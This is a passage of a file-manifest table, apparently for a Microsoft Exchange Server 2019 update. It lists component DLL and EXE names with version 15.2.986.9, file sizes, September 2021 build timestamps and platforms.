20,856| 29-Sep-21| 19:44| x86 \nMicrosoft.exchange.management.activedirectory.dll| 15.2.986.9| 415,096| 29-Sep-21| 20:48| x86 \nMicrosoft.exchange.management.classificationdefinitions.dll| 15.2.986.9| 1,269,624| 29-Sep-21| 20:15| x86 \nMicrosoft.exchange.management.compliancepolicy.dll| 15.2.986.9| 41,848| 29-Sep-21| 21:04| x86 \nMicrosoft.exchange.management.controlpanel.basics.dll| 15.2.986.9| 433,528| 29-Sep-21| 19:58| x86 \nMicrosoft.exchange.management.controlpanel.dll| 15.2.986.9| 4,567,944| 29-Sep-21| 23:22| x86 \nMicrosoft.exchange.management.controlpanel.owaoptionstrings.dll| 15.2.986.9| 261,008| 29-Sep-21| 19:58| x86 \nMicrosoft.exchange.management.controlpanelmsg.dll| 15.2.986.9| 33,656| 29-Sep-21| 19:48| x64 \nMicrosoft.exchange.management.deployment.analysis.dll| 15.2.986.9| 94,096| 29-Sep-21| 19:59| x86 \nMicrosoft.exchange.management.deployment.dll| 15.2.986.9| 588,688| 29-Sep-21| 21:04| x86 \nMicrosoft.exchange.management.deployment.xml.dll| 15.2.986.9| 3,544,448| 29-Sep-21| 19:50| x86 \nMicrosoft.exchange.management.detailstemplates.dll| 15.2.986.9| 67,976| 29-Sep-21| 21:48| x86 \nMicrosoft.exchange.management.dll| 15.2.986.9| #########| 29-Sep-21| 21:33| x86 \nMicrosoft.exchange.management.edge.systemmanager.dll| 15.2.986.9| 58,768| 29-Sep-21| 21:39| x86 \nMicrosoft.exchange.management.infrastructure.asynchronoustask.dll| 15.2.986.9| 23,952| 29-Sep-21| 21:40| x86 \nMicrosoft.exchange.management.jitprovisioning.dll| 15.2.986.9| 101,752| 29-Sep-21| 21:04| x86 \nMicrosoft.exchange.management.migration.dll| 15.2.986.9| 544,144| 29-Sep-21| 21:36| x86 \nMicrosoft.exchange.management.mobility.dll| 15.2.986.9| 305,032| 29-Sep-21| 21:38| x86 \nMicrosoft.exchange.management.nativeresources.dll| 15.2.986.9| 273,808| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.management.powershell.support.dll| 15.2.986.9| 418,696| 29-Sep-21| 21:39| x86 \nMicrosoft.exchange.management.provisioning.dll| 15.2.986.9| 275,856| 29-Sep-21| 21:41| x86 \nMicrosoft.exchange.management.psdirectinvoke.dll| 15.2.986.9| 70,520| 29-Sep-21| 21:43| x86 \nMicrosoft.exchange.management.rbacdefinition.dll| 15.2.986.9| 7,878,520| 29-Sep-21| 20:30| x86 \nMicrosoft.exchange.management.recipient.dll| 15.2.986.9| 1,502,088| 29-Sep-21| 21:38| x86 \nMicrosoft.exchange.management.snapin.esm.dll| 15.2.986.9| 71,568| 29-Sep-21| 21:39| x86 \nMicrosoft.exchange.management.systemmanager.dll| 15.2.986.9| 1,301,384| 29-Sep-21| 21:37| x86 \nMicrosoft.exchange.management.transport.dll| 15.2.986.9| 1,876,368| 29-Sep-21| 21:41| x86 \nMicrosoft.exchange.managementgui.dll| 15.2.986.9| 5,366,672| 29-Sep-21| 20:22| x86 \nMicrosoft.exchange.managementmsg.dll| 15.2.986.9| 36,232| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.mapihttpclient.dll| 15.2.986.9| 117,640| 29-Sep-21| 20:15| x86 \nMicrosoft.exchange.mapihttphandler.dll| 15.2.986.9| 209,808| 29-Sep-21| 21:38| x86 \nMicrosoft.exchange.messagesecurity.dll| 15.2.986.9| 79,752| 29-Sep-21| 20:28| x86 \nMicrosoft.exchange.messagesecurity.messagesecuritymsg.dll| 15.2.986.9| 17,288| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.messagingpolicies.dlppolicyagent.dll| 15.2.986.9| 156,032| 29-Sep-21| 21:12| x86 \nMicrosoft.exchange.messagingpolicies.edgeagents.dll| 15.2.986.9| 65,920| 29-Sep-21| 21:12| x86 \nMicrosoft.exchange.messagingpolicies.eventlog.dll| 15.2.986.9| 30,600| 29-Sep-21| 19:50| x64 \nMicrosoft.exchange.messagingpolicies.filtering.dll| 15.2.986.9| 58,248| 29-Sep-21| 21:09| x86 \nMicrosoft.exchange.messagingpolicies.hygienerules.dll| 15.2.986.9| 29,576| 29-Sep-21| 21:13| x86 \nMicrosoft.exchange.messagingpolicies.journalagent.dll| 15.2.986.9| 175,496| 29-Sep-21| 21:12| x86 \nMicrosoft.exchange.messagingpolicies.redirectionagent.dll| 15.2.986.9| 28,560| 29-Sep-21| 21:12| x86 \nMicrosoft.exchange.messagingpolicies.retentionpolicyagent.dll| 15.2.986.9| 75,152| 29-Sep-21| 21:13| x86 \nMicrosoft.exchange.messagingpolicies.rmsvcagent.dll| 15.2.986.9| 206,224| 29-Sep-21| 21:13| x86 \nMicrosoft.exchange.messagingpolicies.rules.dll| 15.2.986.9| 440,704| 29-Sep-21| 21:10| x86 \nMicrosoft.exchange.messagingpolicies.supervisoryreviewagent.dll| 15.2.986.9| 83,344| 29-Sep-21| 21:14| x86 \nMicrosoft.exchange.messagingpolicies.transportruleagent.dll| 15.2.986.9| 35,192| 29-Sep-21| 21:11| x86 \nMicrosoft.exchange.messagingpolicies.unifiedpolicycommon.dll| 15.2.986.9| 53,120| 29-Sep-21| 21:12| x86 \nMicrosoft.exchange.messagingpolicies.unjournalagent.dll| 15.2.986.9| 96,648| 29-Sep-21| 21:12| x86 \nMicrosoft.exchange.migration.dll| 15.2.986.9| 1,109,904| 29-Sep-21| 21:18| x86 \nMicrosoft.exchange.migrationworkflowservice.eventlog.dll| 15.2.986.9| 14,720| 29-Sep-21| 19:48| x64 \nMicrosoft.exchange.mitigation.service.eventlog.dll| 15.2.986.9| 13,176| 29-Sep-21| 19:50| x64 \nMicrosoft.exchange.mitigation.service.exe| 15.2.986.9| 81,792| 29-Sep-21| 21:47| x86 \nMicrosoft.exchange.mobiledriver.dll| 15.2.986.9| 135,568| 29-Sep-21| 21:07| x86 \nMicrosoft.exchange.monitoring.activemonitoring.local.components.dll| 15.2.986.9| 5,066,128| 29-Sep-21| 22:19| x86 \nMicrosoft.exchange.monitoring.servicecontextprovider.dll| 15.2.986.9| 19,832| 29-Sep-21| 20:22| x86 \nMicrosoft.exchange.mrsmlbconfiguration.dll| 15.2.986.9| 68,488| 29-Sep-21| 20:15| x86 \nMicrosoft.exchange.net.dll| 15.2.986.9| 5,085,584| 29-Sep-21| 19:58| x86 \nMicrosoft.exchange.net.rightsmanagement.dll| 15.2.986.9| 265,616| 29-Sep-21| 20:00| x86 \nMicrosoft.exchange.networksettings.dll| 15.2.986.9| 37,752| 29-Sep-21| 20:02| x86 \nMicrosoft.exchange.notifications.broker.eventlog.dll| 15.2.986.9| 14,224| 29-Sep-21| 19:44| x64 \nMicrosoft.exchange.notifications.broker.exe| 15.2.986.9| 549,240| 29-Sep-21| 22:09| x86 \nMicrosoft.exchange.oabauthmodule.dll| 15.2.986.9| 22,904| 29-Sep-21| 20:49| x86 \nMicrosoft.exchange.oabrequesthandler.dll| 15.2.986.9| 106,360| 29-Sep-21| 21:04| x86 \nMicrosoft.exchange.oauth.core.dll| 15.2.986.9| 291,712| 29-Sep-21| 19:44| x86 \nMicrosoft.exchange.objectstoreclient.dll| 15.2.986.9| 17,288| 29-Sep-21| 19:44| x86 \nMicrosoft.exchange.odata.configuration.dll| 15.2.986.9| 277,880| 29-Sep-21| 20:02| x86 \nMicrosoft.exchange.odata.dll| 15.2.986.9| 2,995,064| 29-Sep-21| 22:06| x86 \nMicrosoft.exchange.officegraph.common.dll| 15.2.986.9| 91,024| 29-Sep-21| 20:48| x86 \nMicrosoft.exchange.officegraph.grain.dll| 15.2.986.9| 101,768| 29-Sep-21| 21:04| x86 \nMicrosoft.exchange.officegraph.graincow.dll| 15.2.986.9| 38,272| 29-Sep-21| 21:04| x86 \nMicrosoft.exchange.officegraph.graineventbasedassistants.dll| 15.2.986.9| 45,456| 29-Sep-21| 21:04| x86 \nMicrosoft.exchange.officegraph.grainpropagationengine.dll| 15.2.986.9| 58,248| 29-Sep-21| 20:57| x86 \nMicrosoft.exchange.officegraph.graintransactionstorage.dll| 15.2.986.9| 147,320| 29-Sep-21| 20:54| x86 \nMicrosoft.exchange.officegraph.graintransportdeliveryagent.dll| 15.2.986.9| 26,504| 29-Sep-21| 21:04| x86 \nMicrosoft.exchange.officegraph.graphstore.dll| 15.2.986.9| 183,160| 29-Sep-21| 20:48| x86 \nMicrosoft.exchange.officegraph.permailboxkeys.dll| 15.2.986.9| 26,512| 29-Sep-21| 20:54| x86 \nMicrosoft.exchange.officegraph.secondarycopyquotamanagement.dll| 15.2.986.9| 38,280| 29-Sep-21| 21:04| x86 \nMicrosoft.exchange.officegraph.secondaryshallowcopylocation.dll| 15.2.986.9| 55,696| 29-Sep-21| 20:54| x86 \nMicrosoft.exchange.officegraph.security.dll| 15.2.986.9| 147,336| 29-Sep-21| 20:48| x86 \nMicrosoft.exchange.officegraph.semanticgraph.dll| 15.2.986.9| 191,880| 29-Sep-21| 21:04| x86 \nMicrosoft.exchange.officegraph.tasklogger.dll| 15.2.986.9| 33,672| 29-Sep-21| 20:55| x86 \nMicrosoft.exchange.partitioncache.dll| 15.2.986.9| 28,040| 29-Sep-21| 19:48| x86 \nMicrosoft.exchange.passivemonitoringsettings.dll| 15.2.986.9| 32,656| 29-Sep-21| 20:01| x86 \nMicrosoft.exchange.photogarbagecollectionservicelet.dll| 15.2.986.9| 15,248| 29-Sep-21| 21:04| x86 \nMicrosoft.exchange.pop3.eventlog.dll| 15.2.986.9| 17,288| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.pop3.eventlog.dll.fe| 15.2.986.9| 17,288| 29-Sep-21| 19:47| Not applicable \nMicrosoft.exchange.pop3.exe| 15.2.986.9| 106,872| 29-Sep-21| 20:54| x86 \nMicrosoft.exchange.pop3.exe.fe| 15.2.986.9| 106,872| 29-Sep-21| 20:54| Not applicable \nMicrosoft.exchange.pop3service.exe| 15.2.986.9| 24,968| 29-Sep-21| 20:50| x86 \nMicrosoft.exchange.pop3service.exe.fe| 15.2.986.9| 24,968| 29-Sep-21| 20:50| Not applicable \nMicrosoft.exchange.popconfiguration.dl1| 15.2.986.9| 42,896| 29-Sep-21| 20:01| Not applicable \nMicrosoft.exchange.popimap.core.dll| 15.2.986.9| 262,544| 29-Sep-21| 20:51| x86 \nMicrosoft.exchange.popimap.core.dll.fe| 15.2.986.9| 262,544| 29-Sep-21| 20:51| Not applicable \nMicrosoft.exchange.powersharp.dll| 15.2.986.9| 357,768| 29-Sep-21| 19:44| x86 \nMicrosoft.exchange.powersharp.management.dll| 15.2.986.9| 4,168,056| 29-Sep-21| 21:45| x86 \nMicrosoft.exchange.powershell.configuration.dll| 15.2.986.9| 308,600| 29-Sep-21| 21:46| x64 \nMicrosoft.exchange.powershell.rbachostingtools.dll| 15.2.986.9| 41,336| 29-Sep-21| 21:44| x86 \nMicrosoft.exchange.protectedservicehost.exe| 15.2.986.9| 30,584| 29-Sep-21| 20:48| x86 \nMicrosoft.exchange.protocols.fasttransfer.dll| 15.2.986.9| 136,056| 29-Sep-21| 21:08| x86 \nMicrosoft.exchange.protocols.mapi.dll| 15.2.986.9| 441,744| 29-Sep-21| 21:06| x86 \nMicrosoft.exchange.provisioning.eventlog.dll| 15.2.986.9| 14,216| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.provisioningagent.dll| 15.2.986.9| 224,648| 29-Sep-21| 21:38| x86 \nMicrosoft.exchange.provisioningservicelet.dll| 15.2.986.9| 105,872| 29-Sep-21| 21:36| x86 \nMicrosoft.exchange.pst.dll| 15.2.986.9| 168,832| 29-Sep-21| 19:44| x86 \nMicrosoft.exchange.pst.dll.deploy| 15.2.986.9| 168,832| 29-Sep-21| 19:44| Not applicable \nMicrosoft.exchange.pswsclient.dll| 15.2.986.9| 259,464| 29-Sep-21| 19:47| x86 \nMicrosoft.exchange.publicfolders.dll| 15.2.986.9| 72,056| 29-Sep-21| 20:00| x86 \nMicrosoft.exchange.pushnotifications.crimsonevents.dll| 15.2.986.9| 215,952| 29-Sep-21| 19:44| x64 \nMicrosoft.exchange.pushnotifications.dll| 15.2.986.9| 106,896| 29-Sep-21| 20:54| x86 \nMicrosoft.exchange.pushnotifications.publishers.dll| 15.2.986.9| 425,336| 29-Sep-21| 20:54| x86 \nMicrosoft.exchange.pushnotifications.server.dll| 15.2.986.9| 70,544| 29-Sep-21| 20:56| x86 \nMicrosoft.exchange.query.analysis.dll| 15.2.986.9| 46,480| 29-Sep-21| 21:20| x86 \nMicrosoft.exchange.query.configuration.dll| 15.2.986.9| 215,928| 29-Sep-21| 20:01| x86 \nMicrosoft.exchange.query.core.dll| 15.2.986.9| 168,840| 29-Sep-21| 21:04| x86 \nMicrosoft.exchange.query.ranking.dll| 15.2.986.9| 343,440| 29-Sep-21| 21:20| x86 \nMicrosoft.exchange.query.retrieval.dll| 15.2.986.9| 174,472| 29-Sep-21| 21:23| x86 \nMicrosoft.exchange.query.suggestions.dll| 15.2.986.9| 95,096| 29-Sep-21| 21:18| x86 \nMicrosoft.exchange.realtimeanalyticspublisherservicelet.dll| 15.2.986.9| 127,352| 29-Sep-21| 21:09| x86 \nMicrosoft.exchange.relevance.core.dll| 15.2.986.9| 63,368| 29-Sep-21| 19:44| x86 \nMicrosoft.exchange.relevance.data.dll| 15.2.986.9| 36,752| 29-Sep-21| 20:35| x64 \nMicrosoft.exchange.relevance.mailtagger.dll| 15.2.986.9| 17,808| 29-Sep-21| 19:52| x64 \nMicrosoft.exchange.relevance.people.dll| 15.2.986.9| 9,666,936| 29-Sep-21| 21:16| x86 \nMicrosoft.exchange.relevance.peopleindex.dll| 15.2.986.9| #########| 29-Sep-21| 20:00| x64 \nMicrosoft.exchange.relevance.peopleranker.dll| 15.2.986.9| 36,744| 29-Sep-21| 20:02| x86 \nMicrosoft.exchange.relevance.perm.dll| 15.2.986.9| 97,656| 29-Sep-21| 19:44| x64 \nMicrosoft.exchange.relevance.sassuggest.dll| 15.2.986.9| 28,560| 29-Sep-21| 19:58| x64 \nMicrosoft.exchange.relevance.upm.dll| 15.2.986.9| 72,080| 29-Sep-21| 19:44| x64 \nMicrosoft.exchange.routing.client.dll| 15.2.986.9| 15,752| 29-Sep-21| 20:15| x86 \nMicrosoft.exchange.routing.eventlog.dll| 15.2.986.9| 13,200| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.routing.server.exe| 15.2.986.9| 58,760| 29-Sep-21| 20:54| x86 \nMicrosoft.exchange.rpc.dll| 15.2.986.9| 1,690,512| 29-Sep-21| 20:02| x64 \nMicrosoft.exchange.rpcclientaccess.dll| 15.2.986.9| 209,808| 29-Sep-21| 20:51| x86 \nMicrosoft.exchange.rpcclientaccess.exmonhandler.dll| 15.2.986.9| 60,296| 29-Sep-21| 20:28| x86 \nMicrosoft.exchange.rpcclientaccess.handler.dll| 15.2.986.9| 517,512| 29-Sep-21| 20:54| x86 \nMicrosoft.exchange.rpcclientaccess.monitoring.dll| 15.2.986.9| 160,632| 29-Sep-21| 20:22| x86 \nMicrosoft.exchange.rpcclientaccess.parser.dll| 15.2.986.9| 723,344| 29-Sep-21| 19:58| x86 \nMicrosoft.exchange.rpcclientaccess.server.dll| 15.2.986.9| 243,088| 29-Sep-21| 20:55| x86 \nMicrosoft.exchange.rpcclientaccess.service.eventlog.dll| 15.2.986.9| 20,872| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.rpcclientaccess.service.exe| 15.2.986.9| 35,216| 29-Sep-21| 21:37| x86 \nMicrosoft.exchange.rpchttpmodules.dll| 15.2.986.9| 42,376| 29-Sep-21| 20:57| x86 \nMicrosoft.exchange.rpcoverhttpautoconfig.dll| 15.2.986.9| 56,208| 29-Sep-21| 21:36| x86 \nMicrosoft.exchange.rpcoverhttpautoconfig.eventlog.dll| 15.2.986.9| 27,536| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.rules.common.dll| 15.2.986.9| 130,448| 29-Sep-21| 20:15| x86 \nMicrosoft.exchange.saclwatcher.eventlog.dll| 15.2.986.9| 14,712| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.saclwatcherservicelet.dll| 15.2.986.9| 20,368| 29-Sep-21| 21:04| x86 \nMicrosoft.exchange.safehtml.dll| 15.2.986.9| 21,368| 29-Sep-21| 19:44| x86 \nMicrosoft.exchange.sandbox.activities.dll| 15.2.986.9| 267,640| 29-Sep-21| 19:47| x86 \nMicrosoft.exchange.sandbox.contacts.dll| 15.2.986.9| 110,984| 29-Sep-21| 19:50| x86 \nMicrosoft.exchange.sandbox.core.dll| 15.2.986.9| 112,504| 29-Sep-21| 19:44| x86 \nMicrosoft.exchange.sandbox.services.dll| 15.2.986.9| 622,464| 29-Sep-21| 19:44| x86 \nMicrosoft.exchange.search.bigfunnel.dll| 15.2.986.9| 184,712| 29-Sep-21| 21:20| x86 \nMicrosoft.exchange.search.bigfunnel.eventlog.dll| 15.2.986.9| 12,168| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.search.blingwrapper.dll| 15.2.986.9| 19,336| 29-Sep-21| 19:50| x86 \nMicrosoft.exchange.search.core.dll| 15.2.986.9| 211,336| 29-Sep-21| 20:49| x86 \nMicrosoft.exchange.search.ediscoveryquery.dll| 15.2.986.9| 17,808| 29-Sep-21| 21:22| x86 \nMicrosoft.exchange.search.engine.dll| 15.2.986.9| 97,672| 29-Sep-21| 20:57| x86 \nMicrosoft.exchange.search.fast.configuration.dll| 15.2.986.9| 16,776| 29-Sep-21| 20:02| x86 \nMicrosoft.exchange.search.fast.dll| 15.2.986.9| 436,600| 29-Sep-21| 20:55| x86 \nMicrosoft.exchange.search.files.dll| 15.2.986.9| 274,296| 29-Sep-21| 21:04| x86 \nMicrosoft.exchange.search.flighting.dll| 15.2.986.9| 24,976| 29-Sep-21| 20:00| x86 \nMicrosoft.exchange.search.mdb.dll| 15.2.986.9| 217,488| 29-Sep-21| 20:54| x86 \nMicrosoft.exchange.search.service.exe| 15.2.986.9| 26,504| 29-Sep-21| 21:04| x86 \nMicrosoft.exchange.security.applicationencryption.dll| 15.2.986.9| 221,072| 29-Sep-21| 20:54| x86 \nMicrosoft.exchange.security.dll| 15.2.986.9| 1,558,912| 29-Sep-21| 20:48| x86 \nMicrosoft.exchange.security.msarpsservice.exe| 15.2.986.9| 19,856| 29-Sep-21| 20:50| x86 \nMicrosoft.exchange.security.securitymsg.dll| 15.2.986.9| 28,536| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.server.storage.admininterface.dll| 15.2.986.9| 225,144| 29-Sep-21| 21:15| x86 \nMicrosoft.exchange.server.storage.common.dll| 15.2.986.9| 5,151,096| 29-Sep-21| 20:22| x86 \nMicrosoft.exchange.server.storage.diagnostics.dll| 15.2.986.9| 214,928| 29-Sep-21| 21:13| x86 \nMicrosoft.exchange.server.storage.directoryservices.dll| 15.2.986.9| 115,576| 29-Sep-21| 21:07| x86 \nMicrosoft.exchange.server.storage.esebackinterop.dll| 15.2.986.9| 82,832| 29-Sep-21| 20:22| x64 \nMicrosoft.exchange.server.storage.eventlog.dll| 15.2.986.9| 80,784| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.server.storage.fulltextindex.dll| 15.2.986.9| 66,440| 29-Sep-21| 20:55| x86 \nMicrosoft.exchange.server.storage.ha.dll| 15.2.986.9| 81,288| 29-Sep-21| 21:10| x86 \nMicrosoft.exchange.server.storage.lazyindexing.dll| 15.2.986.9| 211,840| 29-Sep-21| 21:04| x86 \nMicrosoft.exchange.server.storage.logicaldatamodel.dll| 15.2.986.9| 1,338,744| 29-Sep-21| 21:04| x86 \nMicrosoft.exchange.server.storage.mapidisp.dll| 15.2.986.9| 511,376| 29-Sep-21| 21:11| x86 \nMicrosoft.exchange.server.storage.multimailboxsearch.dll| 15.2.986.9| 47,496| 29-Sep-21| 21:04| x86 \nMicrosoft.exchange.server.storage.physicalaccess.dll| 15.2.986.9| 873,848| 29-Sep-21| 20:54| x86 \nMicrosoft.exchange.server.storage.propertydefinitions.dll| 15.2.986.9| 1,352,592| 29-Sep-21| 20:28| x86 \nMicrosoft.exchange.server.storage.propertytag.dll| 15.2.986.9| 30,608| 29-Sep-21| 20:22| x86 \nMicrosoft.exchange.server.storage.rpcproxy.dll| 15.2.986.9| 130,424| 29-Sep-21| 21:18| x86 \nMicrosoft.exchange.server.storage.storecommonservices.dll| 15.2.986.9| 1,018,248| 29-Sep-21| 21:04| x86 \nMicrosoft.exchange.server.storage.storeintegritycheck.dll| 15.2.986.9| 111,480| 29-Sep-21| 21:07| x86 \nMicrosoft.exchange.server.storage.workermanager.dll| 15.2.986.9| 34,704| 29-Sep-21| 20:22| x86 \nMicrosoft.exchange.server.storage.xpress.dll| 15.2.986.9| 19,320| 29-Sep-21| 19:47| x86 \nMicrosoft.exchange.servicehost.eventlog.dll| 15.2.986.9| 14,736| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.servicehost.exe| 15.2.986.9| 60,792| 29-Sep-21| 21:04| x86 \nMicrosoft.exchange.servicelets.globallocatorcache.dll| 15.2.986.9| 50,552| 29-Sep-21| 20:48| x86 \nMicrosoft.exchange.servicelets.globallocatorcache.eventlog.dll| 15.2.986.9| 14,216| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.servicelets.unifiedpolicysyncservicelet.eventlog.dll| 15.2.986.9| 14,208| 29-Sep-21| 19:50| x64 \nMicrosoft.exchange.services.common.dll| 15.2.986.9| 74,112| 29-Sep-21| 21:08| x86 \nMicrosoft.exchange.services.dll| 15.2.986.9| 8,481,144| 29-Sep-21| 21:51| x86 \nMicrosoft.exchange.services.eventlogs.dll| 15.2.986.9| 30,096| 29-Sep-21| 19:50| x64 \nMicrosoft.exchange.services.ewshandler.dll| 15.2.986.9| 633,744| 29-Sep-21| 22:02| x86 \nMicrosoft.exchange.services.ewsserialization.dll| 15.2.986.9| 1,651,080| 29-Sep-21| 21:54| x86 \nMicrosoft.exchange.services.json.dll| 15.2.986.9| 296,328| 29-Sep-21| 21:58| x86 \nMicrosoft.exchange.services.messaging.dll| 15.2.986.9| 43,384| 29-Sep-21| 21:52| x86 \nMicrosoft.exchange.services.onlinemeetings.dll| 15.2.986.9| 232,848| 29-Sep-21| 20:50| x86 \nMicrosoft.exchange.services.surface.dll| 15.2.986.9| 178,552| 29-Sep-21| 22:00| x86 \nMicrosoft.exchange.services.wcf.dll| 15.2.986.9| 348,552| 29-Sep-21| 21:56| x86 \nMicrosoft.exchange.setup.acquirelanguagepack.dll| 15.2.986.9| 56,720| 29-Sep-21| 19:52| x86 \nMicrosoft.exchange.setup.bootstrapper.common.dll| 15.2.986.9| 96,136| 29-Sep-21| 19:58| x86 \nMicrosoft.exchange.setup.common.dll| 15.2.986.9| 297,864| 29-Sep-21| 21:48| x86 \nMicrosoft.exchange.setup.commonbase.dll| 15.2.986.9| 35,728| 29-Sep-21| 21:39| x86 \nMicrosoft.exchange.setup.console.dll| 15.2.986.9| 27,000| 29-Sep-21| 21:50| x86 \nMicrosoft.exchange.setup.gui.dll| 15.2.986.9| 116,600| 29-Sep-21| 21:50| x86 \nMicrosoft.exchange.setup.parser.dll| 15.2.986.9| 54,152| 29-Sep-21| 21:38| x86 \nMicrosoft.exchange.setup.signverfwrapper.dll| 15.2.986.9| 75,144| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.sharedcache.caches.dll| 15.2.986.9| 142,728| 29-Sep-21| 20:48| x86 \nMicrosoft.exchange.sharedcache.client.dll| 15.2.986.9| 24,968| 29-Sep-21| 20:15| x86 \nMicrosoft.exchange.sharedcache.eventlog.dll| 15.2.986.9| 15,248| 29-Sep-21| 19:48| x64 \nMicrosoft.exchange.sharedcache.exe| 15.2.986.9| 58,744| 29-Sep-21| 20:49| x86 \nMicrosoft.exchange.sharepointsignalstore.dll| 15.2.986.9| 27,016| 29-Sep-21| 19:47| x86 \nMicrosoft.exchange.slabmanifest.dll| 15.2.986.9| 46,968| 29-Sep-21| 19:44| x86 \nMicrosoft.exchange.sqm.dll| 15.2.986.9| 46,968| 29-Sep-21| 19:52| x86 \nMicrosoft.exchange.store.service.exe| 15.2.986.9| 28,040| 29-Sep-21| 21:20| x86 \nMicrosoft.exchange.store.worker.exe| 15.2.986.9| 26,488| 29-Sep-21| 21:17| x86 \nMicrosoft.exchange.storeobjectsservice.eventlog.dll| 15.2.986.9| 13,712| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.storeobjectsservice.exe| 15.2.986.9| 31,632| 29-Sep-21| 20:54| x86 \nMicrosoft.exchange.storeprovider.dll| 15.2.986.9| 1,205,112| 29-Sep-21| 20:01| x86 \nMicrosoft.exchange.structuredquery.dll| 15.2.986.9| 158,600| 29-Sep-21| 19:44| x64 \nMicrosoft.exchange.symphonyhandler.dll| 15.2.986.9| 628,088| 29-Sep-21| 21:25| x86 \nMicrosoft.exchange.syncmigration.eventlog.dll| 15.2.986.9| 13,200| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.syncmigrationservicelet.dll| 15.2.986.9| 16,272| 29-Sep-21| 21:38| x86 \nMicrosoft.exchange.systemprobemsg.dll| 15.2.986.9| 13,184| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.textprocessing.dll| 15.2.986.9| 221,576| 29-Sep-21| 20:15| x86 \nMicrosoft.exchange.textprocessing.eventlog.dll| 15.2.986.9| 13,712| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.transport.agent.addressbookpolicyroutingagent.dll| 15.2.986.9| 29,064| 29-Sep-21| 21:09| x86 \nMicrosoft.exchange.transport.agent.antispam.common.dll| 15.2.986.9| 138,128| 29-Sep-21| 21:07| x86 \nMicrosoft.exchange.transport.agent.contentfilter.cominterop.dll| 15.2.986.9| 21,904| 29-Sep-21| 20:15| x86 \nMicrosoft.exchange.transport.agent.controlflow.dll| 15.2.986.9| 40,312| 29-Sep-21| 21:08| x86 \nMicrosoft.exchange.transport.agent.faultinjectionagent.dll| 15.2.986.9| 22,928| 29-Sep-21| 21:12| x86 \nMicrosoft.exchange.transport.agent.frontendproxyagent.dll| 15.2.986.9| 21,384| 29-Sep-21| 21:05| x86 \nMicrosoft.exchange.transport.agent.hygiene.dll| 15.2.986.9| 212,368| 29-Sep-21| 21:11| x86 \nMicrosoft.exchange.transport.agent.interceptoragent.dll| 15.2.986.9| 99,216| 29-Sep-21| 21:11| x86 \nMicrosoft.exchange.transport.agent.liveidauth.dll| 15.2.986.9| 22,928| 29-Sep-21| 21:07| x86 \nMicrosoft.exchange.transport.agent.malware.dll| 15.2.986.9| 169,352| 29-Sep-21| 21:21| x86 \nMicrosoft.exchange.transport.agent.malware.eventlog.dll| 15.2.986.9| 18,312| 29-Sep-21| 19:44| x64 \nMicrosoft.exchange.transport.agent.phishingdetection.dll| 15.2.986.9| 20,880| 29-Sep-21| 20:48| x86 \nMicrosoft.exchange.transport.agent.prioritization.dll| 15.2.986.9| 31,608| 29-Sep-21| 21:09| x86 \nMicrosoft.exchange.transport.agent.protocolanalysis.dbaccess.dll| 15.2.986.9| 46,968| 29-Sep-21| 21:09| x86 \nMicrosoft.exchange.transport.agent.search.dll| 15.2.986.9| 30,096| 29-Sep-21| 21:07| x86 \nMicrosoft.exchange.transport.agent.senderid.core.dll| 15.2.986.9| 53,136| 29-Sep-21| 20:48| x86 \nMicrosoft.exchange.transport.agent.sharedmailboxsentitemsroutingagent.dll| 15.2.986.9| 47,496| 29-Sep-21| 21:06| x86 \nMicrosoft.exchange.transport.agent.systemprobedrop.dll| 15.2.986.9| 18,320| 29-Sep-21| 20:28| x86 \nMicrosoft.exchange.transport.agent.transportfeatureoverrideagent.dll| 15.2.986.9| 46,480| 29-Sep-21| 21:13| x86 \nMicrosoft.exchange.transport.agent.trustedmailagents.dll| 15.2.986.9| 46,456| 29-Sep-21| 21:09| x86 \nMicrosoft.exchange.transport.cloudmonitor.common.dll| 15.2.986.9| 28,040| 29-Sep-21| 19:50| x86 \nMicrosoft.exchange.transport.common.dll| 15.2.986.9| 457,096| 29-Sep-21| 20:48| x86 \nMicrosoft.exchange.transport.contracts.dll| 15.2.986.9| 18,296| 29-Sep-21| 20:54| x86 \nMicrosoft.exchange.transport.decisionengine.dll| 15.2.986.9| 30,608| 29-Sep-21| 20:15| x86 \nMicrosoft.exchange.transport.dll| 15.2.986.9| 4,182,920| 29-Sep-21| 21:04| x86 \nMicrosoft.exchange.transport.dsapiclient.dll| 15.2.986.9| 182,152| 29-Sep-21| 20:48| x86 \nMicrosoft.exchange.transport.eventlog.dll| 15.2.986.9| 121,744| 29-Sep-21| 19:47| x64 \nMicrosoft.exchange.transport.extensibility.dll| 15.2.986.9| 406,928| 29-Sep-21| 20:48| x86 \nMicrosoft.exchange.transport.extensibilityeventlog.dll| 15.2.986.9| 14,728| 29-Sep-21| 19:50| x64 \nMicrosoft.exchange.transport.flighting.dll| 15.2.986.9| 90,000| 29-Sep-21| 20:15| x86 \nMicrosoft.exchange.transport.logging.dll| 15.2.986.9| 88,976| 29-Sep-21| 20:48| x86 \nMicrosoft.exchange.transport.logging.search.dll| 15.2.986.9| 68,472| 29-Sep-21| 20:28| x86 \nMicrosoft.exchange.transport.loggingcommon.dll| 15.2.986.9| 63,376| 29-Sep-21| 20:28| x86 \nMicrosoft.exchange.transport.monitoring.dll| 15.2.986.9| 428,936| 29-Sep-21| 22:22| x86 \nMicrosoft.exchange.transport.net.dll| 15.2.986.9| 121,232| 29-Sep-21| 20:50| x86 \nMicrosoft.exchange.transport.protocols.contracts.dll| 15.2.986.9| 17,784| 29-Sep-21| 20:54| x86 \nMicrosoft.exchange.transport.protocols.dll| 15.2.986.9| 29,072| 29-Sep-21| 20:55| x86 